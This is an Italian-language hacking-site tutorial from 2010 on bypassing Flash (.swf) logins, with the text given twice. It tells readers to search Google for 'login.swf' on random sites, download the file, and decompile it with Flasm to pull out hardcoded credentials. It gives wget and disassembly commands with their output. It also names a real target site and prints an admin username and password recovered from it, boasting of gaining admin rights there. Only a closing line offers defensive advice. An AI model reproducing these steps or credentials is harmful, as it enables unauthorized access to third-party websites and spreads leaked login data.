spacer.png, 0 kB

Bypass Flash Login (.swf) PDF Stampa E-mail
Valutazione attuale: / 9
ScarsoOttimo 
Mercoledì 13 Gennaio 2010 23:49
Illudere qualsiasi Flash Login
Girando per la rete ho trovato questo comodo tool per deassemblare file in flash... Flasm
Premetto che i flash developer non pensano assolutamente alla sicurezza, quindi dentro ai loro swf inseriscono in chiaro user e pass...
Per testare questa guida basta andare su google cercare "login.swf", scegliere un risultato a caso e scaricarsi il file in locale per deassemblarlo. es :
ho trovato : login.swf
il file login è login.swf ( trovato spulciando le poche righe di html )
quindi ho prelevato : www.sztrimz.com/members/login.swf
Iniziamo con lo scaricare l'eseguibile per "niubbi" precompilato e dezipparlo :
codice:
wget http://www.nowrap.de/download/flasm16linux.tgz
tar xvfz flasm16linux.tgz
Ora abbiamo in locale il nostro deassmblatore, non ci resta che prelevare il file login della "vittima"
codice:
wget http://www.SITOVITTIMA.it/login.swf
Deassembliamo il file e cerchiamo le push:
codice:
./flasm -d login.asm l grep push
il nostro output sarà tipo :
codice:
root@server:~# ./flasm -d login.swf | grep push
push 'V'
push '0'
push '1'
push 'String'
push 'z'
push ''
push '1'
push 'String'
push 'z'
push 'userBox'
push 'passBox'
push 'z'
push 'admin7542411165'
push 'V'
push '1'
push 'z'
push 'fidelitysucks'
push 'V'
push '1'
push 'V'
push '0'
push 'userBox'
push ''
push 'passBox'
push ''
root@server:~#
Ci salta subito all'occhio
codice:
push 'admin7542411165'
non ci resta che tornare sul sito de lla vittima e nel campo username inserire : admin7542411165
Et voilà siamo amministratori su quella pagina.
Quindi se qualcuno di voi sviluppa in Flash, tenga conto che basta un semplice deassembler per leggere l'intero contenuto dei file .swf , pertanto consiglio sempre di appoggiarvi ad un db sql per la gestione di utenti e autorizzazioni
Saluti.
Illudere(cracckare) qualsiasi Flash Login
Girando per la rete ho trovato questo comodo tool per deassemblare file in flash... Flasm
Premetto che i flash developer non pensano assolutamente alla sicurezza, quindi dentro ai loro swf inseriscono in chiaro user e pass...
Per testare questa guida basta andare su google cercare "login.swf", scegliere un risultato a caso e scaricarsi il file in locale per deassemblarlo. es :
ho trovato : www.sztrimz.com/members/login.html
[code]il file login è login.swf spulciando il sorgente html ho trovato : <PARAM NAME=movie VALUE="login.swf">[/code]
[code]quindi ho prelevato : www.sztrimz.com/members/login.swf[/code]
Iniziamo con lo scaricare l'eseguibile per "niubbi" precompilato e dezipparlo :
wget http://www.nowrap.de/download/flasm16linux.tgz
[code]tar xvfz flasm16linux.tgz[/code]
Ora abbiamo in locale il nostro deassmblatore, non ci resta che prelevare il file login della "vittima"
wget http://www.SITOVITTIMA.it/login.swf
Deassembliamo il file e cerchiamo le push:
./flasm -d login.swf l grep push
il nostro output sarà tipo :
root@server:~# ./flasm -d login.swf | grep push
[code]push 'V'[/code]
[code]push '0'[/code]
[code]push '1'[/code]
[code]push 'String'[/code]
[code]push 'z'[/code]
[code]push 'userBox'[/code]
[code]push 'passBox'[/code]
[code]push 'z'[/code]
[code]push 'admin7542411165'[/code]
[code]push 'V'[/code]
[code]push '1'[/code]
[code]push 'z'[/code]
[code]push 'fidelitysucks'[/code]
[code]root@server:~#[/code]
Ci salta subito all'occhio
push 'admin7542411165'
non ci resta che tornare sul sito della vittima e nel campo username inserire : admin7542411165
Et voilà siamo amministratori su quella pagina.
Quindi se qualcuno di voi sviluppa in Flash, tenga conto che basta un semplice deassembler per leggere l'intero contenuto dei file .swf , pertanto consiglio sempre di appoggiarvi ad un db sql per la gestione di utenti e autorizzazioni
Saluti.

Comments (0)

 
Ricerca in NetMind
Anonymous Okno
Menu Principale
Menu Papers
Menu Download
Menu Links
Stats
Tot. visite contenuti : 342659
 9 visitatori online